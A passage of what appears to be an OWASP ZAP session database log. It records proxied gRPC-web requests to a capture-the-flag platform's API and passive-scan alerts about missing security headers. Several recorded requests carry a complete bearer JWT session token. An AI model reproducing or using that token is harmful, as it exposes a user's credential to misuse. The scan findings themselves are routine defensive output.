Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',9,9,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(27,12,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(28,12,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(19,572,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 20 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=18 -INSERT INTO BLOCKS VALUES(18,1,0) -INSERT INTO BLOCKS VALUES(19,2147483628,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=18 -INSERT INTO LOBS VALUES(18,1,0,19) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(19,1,'2024-03-02 03:34:59.187000',1,19,NULL,572,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=19 -INSERT INTO LOB_IDS VALUES(19,572,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(10,1709346750724,1,200,1709346900752,297,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:01 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(20,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 21 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=19 -INSERT INTO BLOCKS VALUES(19,1,0) -INSERT INTO BLOCKS VALUES(20,2147483627,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=19 -INSERT INTO LOBS VALUES(19,1,0,20) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(20,1,'2024-03-02 03:35:01.052000',1,20,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=20 -INSERT INTO LOB_IDS VALUES(20,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(13,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',10,10,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(29,13,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(30,13,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=4 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',5,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=3 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',4,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=4 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',5,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=3 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',4,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=4 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',5,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=3 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',4,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=4 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',5,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=3 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',4,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(21,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 22 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=20 -INSERT INTO BLOCKS VALUES(20,1,0) -INSERT INTO BLOCKS VALUES(21,2147483626,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=20 -INSERT INTO LOBS VALUES(20,1,0,21) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(21,1,'2024-03-02 03:35:01.274000',1,21,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=21 -INSERT INTO LOB_IDS VALUES(21,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(14,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',10,10,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(31,14,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(32,14,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(22,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 23 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=21 -INSERT INTO BLOCKS VALUES(21,1,0) -INSERT INTO BLOCKS VALUES(22,2147483625,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=21 -INSERT INTO LOBS VALUES(21,1,0,22) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(22,1,'2024-03-02 03:35:01.281000',1,22,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=22 -INSERT INTO LOB_IDS VALUES(22,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(11,1709346750724,1,200,1709346902634,106,'OPTIONS','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','OPTIONS https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aAccess-Control-Request-Method: POST\u000d\u000aAccess-Control-Request-Headers: authorization,content-type,x-grpc-web,x-user-agent\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Headers: content-type,accept,x-user-agent,x-grpc-web,grpc-status,grpc-message,authorization\u000d\u000aAccess-Control-Allow-Methods: GET,HEAD,POST,PUT,DELETE\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Length: 0\u000d\u000aDate: Sat, 02 Mar 2024 02:35:02 GMT\u000d\u000aServer: Caddy\u000d\u000a\u000d\u000a','',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(23,324,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 24 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=22 -INSERT INTO BLOCKS VALUES(22,1,0) -INSERT INTO BLOCKS VALUES(23,2147483624,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=22 -INSERT INTO LOBS VALUES(22,1,0,23) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(23,1,'2024-03-02 03:35:02.743000',1,23,NULL,324,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=23 -INSERT INTO LOB_IDS VALUES(23,324,1,40) -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=18 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Headers' AND USED=1 AND FLAGS='' AND VALS='content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization' -INSERT INTO PARAM VALUES(18,'api.cscg.live:444','header','Access-Control-Allow-Headers',2,'','content-type%2Caccept%2Cx-user-agent%2Cx-grpc-web%2Cgrpc-status%2Cgrpc-message%2Cauthorization') -COMMIT -DELETE FROM PARAM WHERE PARAMID=19 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Methods' AND USED=1 AND FLAGS='' AND VALS='GET%2CHEAD%2CPOST%2CPUT%2CDELETE' -INSERT INTO PARAM VALUES(19,'api.cscg.live:444','header','Access-Control-Allow-Methods',2,'','GET%2CHEAD%2CPOST%2CPUT%2CDELETE') -COMMIT -DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=5 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',6,'','https://play.cscg.live') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(15,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',11,11,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(33,15,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(34,15,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=5 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',6,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=20 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Length' AND USED=1 AND FLAGS='' AND VALS='0' -INSERT INTO PARAM VALUES(20,'api.cscg.live:444','header','Content-Length',2,'','0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=5 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',6,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=5 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',6,'','Caddy') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(24,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 25 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=23 -INSERT INTO BLOCKS VALUES(23,1,0) -INSERT INTO BLOCKS VALUES(24,2147483623,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=23 -INSERT INTO LOBS VALUES(23,1,0,24) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(24,1,'2024-03-02 03:35:02.956000',1,24,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=24 -INSERT INTO LOB_IDS VALUES(24,552,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(12,1709346750724,1,200,1709346902745,278,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: */*\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aReferer: https://play.cscg.live/\u000d\u000aauthorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1aWQiOiIzMDYwODYxNzY1ODUxNTQ1NjAiLCJleHAiOjE3MDk5MTMzMjh9.JpFHIOU8-a2WYlNV5ULXkK-u_99MLNy-igxO672RIuI\u000d\u000acontent-type: application/grpc-web+proto\u000d\u000ax-grpc-web: 1\u000d\u000ax-user-agent: connect-es/1.3.0\u000d\u000aContent-Length: 44\u000d\u000aOrigin: https://play.cscg.live\u000d\u000aConnection: keep-alive\u000d\u000aSec-Fetch-Dest: empty\u000d\u000aSec-Fetch-Mode: cors\u000d\u000aSec-Fetch-Site: same-site\u000d\u000a\u000d\u000a','00000000270a18373232653363613365393262363863656666353830336664120b696e74726f2d7765622d32','HTTP/1.1 200 OK\u000d\u000aAccess-Control-Allow-Origin: https://play.cscg.live\u000d\u000aAccess-Control-Expose-Headers: Access-Control-Allow-Origin, Vary, Date, Content-Type, grpc-status, grpc-message\u000d\u000aAlt-Svc: h3=":443"; ma=2592000\u000d\u000aContent-Type: application/grpc-web+proto\u000d\u000aServer: Caddy\u000d\u000aVary: Origin\u000d\u000aDate: Sat, 02 Mar 2024 02:35:03 GMT\u000d\u000acontent-length: 129\u000d\u000a\u000d\u000a','00000000670a1837323265336361336539326236386365666635383033666410011a49123d3732326533636133653932623638636566663538303366642d313032342d696e74726f2d7765622d322e6368616c6c656e67652e637363672e6c69766518b90a220568747470738000000010677270632d7374617475733a20300d0a',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(25,323,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 26 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=24 -INSERT INTO BLOCKS VALUES(24,1,0) -INSERT INTO BLOCKS VALUES(25,2147483622,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=24 -INSERT INTO LOBS VALUES(24,1,0,25) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(25,1,'2024-03-02 03:35:03.024000',1,25,NULL,323,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=25 -INSERT INTO LOB_IDS VALUES(25,323,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(16,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',12,12,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(35,16,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(36,16,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=1 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Allow-Origin' AND USED=6 AND FLAGS='' AND VALS='https://play.cscg.live' -INSERT INTO PARAM VALUES(1,'api.cscg.live:444','header','Access-Control-Allow-Origin',7,'','https://play.cscg.live') -COMMIT -DELETE FROM PARAM WHERE PARAMID=2 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Access-Control-Expose-Headers' AND USED=4 AND FLAGS='' AND VALS='Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message' -INSERT INTO PARAM VALUES(2,'api.cscg.live:444','header','Access-Control-Expose-Headers',5,'','Access-Control-Allow-Origin%2C Vary%2C Date%2C Content-Type%2C grpc-status%2C grpc-message') -COMMIT -DELETE FROM PARAM WHERE PARAMID=3 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Alt-Svc' AND USED=6 AND FLAGS='' AND VALS='h3=":443"; ma=2592000' -INSERT INTO PARAM VALUES(3,'api.cscg.live:444','header','Alt-Svc',7,'','h3=":443"; ma=2592000') -COMMIT -DELETE FROM PARAM WHERE PARAMID=4 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Content-Type' AND USED=4 AND FLAGS='' AND VALS='application/grpc-web+proto' -INSERT INTO PARAM VALUES(4,'api.cscg.live:444','header','Content-Type',5,'','application/grpc-web+proto') -COMMIT -DELETE FROM PARAM WHERE PARAMID=5 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Server' AND USED=6 AND FLAGS='' AND VALS='Caddy' -INSERT INTO PARAM VALUES(5,'api.cscg.live:444','header','Server',7,'','Caddy') -COMMIT -DELETE FROM PARAM WHERE PARAMID=6 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Vary' AND USED=4 AND FLAGS='' AND VALS='Origin' -INSERT INTO PARAM VALUES(6,'api.cscg.live:444','header','Vary',5,'','Origin') -COMMIT -DELETE FROM PARAM WHERE PARAMID=7 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='Date' AND USED=6 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT' -INSERT INTO PARAM VALUES(7,'api.cscg.live:444','header','Date',7,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:35:02 GMT,Sat%2C 02 Mar 2024 02:35:03 GMT,Sat%2C 02 Mar 2024 02:34:57 GMT,Sat%2C 02 Mar 2024 02:34:55 GMT,Sat%2C 02 Mar 2024 02:35:01 GMT,Sat%2C 02 Mar 2024 02:34:58 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=8 AND SITE='api.cscg.live:444' AND TYPE='header' AND NAME='content-length' AND USED=4 AND FLAGS='' AND VALS='129' -INSERT INTO PARAM VALUES(8,'api.cscg.live:444','header','content-length',5,'','129') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(26,552,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 27 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=25 -INSERT INTO BLOCKS VALUES(25,1,0) -INSERT INTO BLOCKS VALUES(26,2147483621,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=25 -INSERT INTO LOBS VALUES(25,1,0,26) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(26,1,'2024-03-02 03:35:03.236000',1,26,NULL,552,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=26 -INSERT INTO LOB_IDS VALUES(26,552,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(17,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',12,12,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(37,17,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(38,17,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(27,573,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 28 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=26 -INSERT INTO BLOCKS VALUES(26,1,0) -INSERT INTO BLOCKS VALUES(27,2147483620,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=26 -INSERT INTO LOBS VALUES(26,1,0,27) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(27,1,'2024-03-02 03:35:03.262000',1,27,NULL,573,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=27 -INSERT INTO LOB_IDS VALUES(27,573,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(13,1709346750724,1,200,1709346904639,173,'POST','https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus','POST https://api.cscg.live:444/platform.Platform/BrokerGetSessionStatus HTTP/1.1\u000d\u000ahost: api.cscg.live:444\u000d\u000aUser-Agent: 